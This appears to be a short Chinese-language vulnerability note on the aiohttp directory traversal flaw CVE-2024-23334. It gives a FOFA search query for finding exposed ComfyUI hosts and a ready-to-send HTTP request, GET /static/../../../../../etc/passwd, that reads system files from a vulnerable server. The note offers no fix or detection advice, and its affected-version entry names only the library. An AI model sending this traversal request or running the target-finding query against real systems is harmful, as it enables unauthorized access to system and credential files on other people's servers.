# python aiohttp插件存在目录遍历漏洞(CVE-2024-23334)

# 一、漏洞简介
aiohttp是一个用于异步网络编程的Python库，支持客户端和服务器端的网络通信。它利用Python的asyncio库来实现异步IO操作，这意味着它可以处理大量并发网络连接，而不会导致线程阻塞或性能下降。aiohttp常用于需要高性能网络通信的应用程序，如高频交易平台、大规模并发API服务等。aiohttp 存在目录遍历漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

# 二、影响版本
+ aiohttp

# 三、资产测绘
+ fofa`title=="ComfyUI""`
+ 特征

![1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c.png](./img/SDWMxOF8-pVDuhg2/1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c-685432.png)![1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7.png](./img/SDWMxOF8-pVDuhg2/1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7-373275.png)

# 四、漏洞复现
```plain
GET /static/../../../../../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

```

![1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2.png](./img/SDWMxOF8-pVDuhg2/1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2-977848.png)



> 更新: 2024-09-05 23:27:24  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zaatbgfawgop0f6e>